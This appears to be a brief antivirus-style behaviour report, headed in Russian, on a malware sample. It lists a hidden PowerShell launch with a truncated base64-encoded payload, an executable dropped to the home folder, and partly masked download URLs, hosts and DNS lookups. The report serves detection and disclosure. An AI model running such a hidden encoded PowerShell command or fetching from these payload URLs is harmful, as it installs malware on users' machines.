Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABLAGEAdgB3AGwAcgB6AGgAPQAnAEUAZgBtAHIAZAB3AG4AdQBkAHUAJwA7ACQARwBqAGUAdwB1AGQAbwBoAHAAYwBsAGYAIAA9ACAAJwA0ADEANAAnADsAJABCAGoAegBtAG0AYQBlAGUAZwB0AHUAagB6AD0AJwBOAG8AcwB6AG0AcwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1596
- %TEMP%\1369189.cvr
- %HOMEPATH%\414.exe
- %HOMEPATH%\414.exe
- %HOMEPATH%\414.exe
- 'bo#####mpcardiff.com':80
- 'sa####curtis.biz':80
- 'sa####curtis.biz':443
- 'th###iro.za.net':443
- 'ca#####magicshop.com':80
- http://bo#####mpcardiff.com/xdw2f/mk/
- http://sa####curtis.biz/wp-admin/rm/
- http://ca#####magicshop.com/images/n23/
- 'sa####curtis.biz':443
- 'th###iro.za.net':443
- DNS ASK bo#####mpcardiff.com
- DNS ASK to###ogohan.com
- DNS ASK sa####curtis.biz
- DNS ASK th###iro.za.net
- DNS ASK ca#####magicshop.com